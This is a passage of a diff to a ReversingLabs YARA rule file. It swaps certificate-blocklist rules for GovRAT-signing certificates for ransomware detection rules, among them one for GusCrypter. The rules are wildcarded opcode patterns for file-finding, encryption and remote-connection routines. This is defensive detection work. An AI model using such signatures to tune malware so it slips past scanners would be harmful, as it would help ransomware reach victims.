+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0
+            74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
+            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ??
+            50 8B CE E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ?? ?? ?? ?? 3B
+        }
+		$find_files_p8 = {
+            C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 74 ?? 8D 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32 DB 8B 85 ??
+            ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F
+            84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ??
+            8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74
+            ?? 8B 01 85 C0 74 ?? 90 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
+            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? E9 ??
+            ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ??
+            ?? ?? ?? 3B C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 75 ?? 8D
+        }
+		$find_files_p9 = {
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32
+            DB 8B 85 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C6 45 ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ??
+            ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ??
+            F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B
+            01 8B 40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ??
+            ?? E9 ?? ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ??
+            ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ??
+            8B 01 85 C0 74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B
+        }
+		$find_files_p10 = {
+            40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB
+            ?? 50 8B CE E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ??
+            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ??
+            75 ?? 33 FF 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
+            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B
+            48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 55 8B 6C 24 ?? 56 8B
+            74 24 ?? 57 8B 7C 24 ?? 85 F6 0F 8E ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8 ?? ?? ?? ??
+            83 C4 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ??
+            ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 4C 24 ?? 8B C1
+            83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ??
+            83 C4 ?? 85 C0 75 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 85 C0 75
+        }
+		$encrypt_files_p2 = {
+            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 33 C9
+            85 F6 7E ?? 8D 56 ?? 53 8B 5C 24 ?? 03 D7 66 0F 1F 44 00 ?? 8A 04 19 8D 52 ?? 41 88
+            42 ?? 3B CE 7C ?? 5B 8D 44 24 ?? 89 74 24 ?? 50 8B 44 24 ?? 57 6A ?? 6A ?? 6A ?? FF
+            70 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44
+            24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? FF 74 24 ?? 57 E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC
+            E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 74 24 ?? 56 57 55 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 8B C6 5F 5E 5D
+            33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
+        }
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? E8 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B D8 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83
+            C4 ?? 49 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? 83 3D ?? ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 89 41 ?? 8B F2 A1 ?? ?? ?? ?? 89
+            41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 8A 02 42 84 C0 75 ?? 8D BD ??
+            ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4
+            8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            8B F2 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 66 90 8A 02 42 84
+            C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B
+            CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 8B F3 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 8A 03 43
+            84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B DE 4F 8A 47 ?? 47 84 C0 75 ?? 8B CB C1 E9 ?? F3 A5
+            8B CB 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 8B F2 89 01 A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 0F
+        }
+		$remote_connection_p2 = {
+            1F 44 00 ?? 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ??
+            8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D
+            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
+            ?? A0 ?? ?? ?? ?? 6A ?? 88 41 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 45
+            ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 51 ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ??
+            ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85
+            DB 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6
+            74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 56
+            FF 15 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF B5 ?? ?? ?? ?? FF D7 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B
+            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HON HAI PRECISION INDUSTRY CO. LTD." and pe.signatures [ i ] . serial == "25:65:41:e2:04:61:90:33:f8:b0:9f:9e:b7:c8:8e:f8" and 1424303999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_00E8Cc18Cf100B6B27443Ef26319398734 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Guscrypter : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects GusCrypter ransomware."
 		author = "ReversingLabs"
-		id = "f7e80c51-9dcf-599a-8164-c07cf4c9c5ff"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "64aa468c-ec24-58aa-8ea9-23f0cebed227"
+		date = "2020-11-26"
+		modified = "2020-11-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1434-L1452"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GusCrypter.yara#L1-L129"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "68e9df056109cae41d981090c7a98ddc192a445647d7475569ddbe4118e570c5"
+		logic_hash = "cfe6005028c0e5f5d713af2a549574203678bab2ee48acc1727702bcf91522b1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GusCrypter"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Syngenta" and ( pe.signatures [ i ] . serial == "00:e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" or pe.signatures [ i ] . serial == "e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" ) and 1404172799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_62Af28A7657Ba8Ab10Fa8E2D47250C69 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
-		author = "ReversingLabs"
-		id = "cba20a1b-5d24-5a1f-8f2f-8c47add846d6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1454-L1470"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c3c034cb4e2c65e2269fbfd9c045eb294badde60389ae62ed694ea4d61c5eb35"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 45 ?? 8B 5D ?? 83 FB ?? 8B 75 ?? 8B 4D ?? 0F 43 C6 83 F9 ?? 75 ?? 80 38 ?? 0F
+            84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? BA ?? ?? ?? ?? 66 39 10 0F
+            84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 66 81 3A ?? ?? 75 ?? 80 7A
+            ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 81 3A ?? ?? ?? ?? 75 ??
+            66 81 7A ?? ?? ?? 75 ?? 80 7A ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 FB ?? 0F
+            43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83
+            EF ?? 73 ?? 8A 01 3A 02 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 F8
+            ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF ?? 73 ??
+            66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D
+            ?? 0F 43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2
+            ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 4D
+            ?? 8D 45 ?? 83 FB ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ??
+            ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75
+        }
+		$find_files_p2 = {
+            81 38 ?? ?? ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83
+            F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ??
+            81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ??
+            0F 43 CE 83 7D ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ??
+            83 C2 ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ??
+            83 FB ?? 8D 45 ?? 0F 43 C6 83 7D ?? ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ??
+            ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 7D
+            ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF
+            ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0 75
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ??
+            ?? 8B CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
+            C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
+            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B BD ?? ?? ?? ?? C6 45 ?? ?? 83 FB ?? 72 ?? 43 8B C6 81 FB ?? ?? ?? ??
+            72 ?? 8B 76 ?? 83 C3 ?? 2B C6 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 53 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF
+            15
+        }
+		$encrypt_files_p1 = {
+            88 84 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7C ?? 33 FF 33 F6 8B C6 8A 9C 35 ?? ?? ?? ??
+            99 F7 7D ?? 0F B6 04 0A 03 F8 0F B6 CB 03 F9 81 E7 ?? ?? ?? ?? 79 ?? 4F 81 CF ?? ??
+            ?? ?? 47 8A 84 3D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 88 84 35 ?? ?? ?? ?? 46 88 9C 3D ??
+            ?? ?? ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50
+            E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8B 4D ?? 32 D2 E8 ?? ?? ?? ??
+            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
+            F8 ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45
+            ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 BD ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 33 F6
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
+        }
+		$encrypt_files_p2 = {
+            0F BE 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 46 83 C4 ?? 83 FE ?? 7C ?? 53 E8 ?? ?? ??
+            ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83
+            7D ?? ?? 8D 4D ?? 8A 85 ?? ?? ?? ?? 0F 43 4D ?? C7 45 ?? ?? ?? ?? ?? 88 01 C6 41 ??
+            ?? 33 C9 8B 75 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            4D ?? 83 7D ?? ?? 8B F8 0F 43 4D ?? 56 57 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE
+            07 FF B5 ?? ?? ?? ?? 35 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ??
+            83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 32 D2 C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 50 ?? 8B C1
+            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ??
+            ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$misc_checks_p1 = {
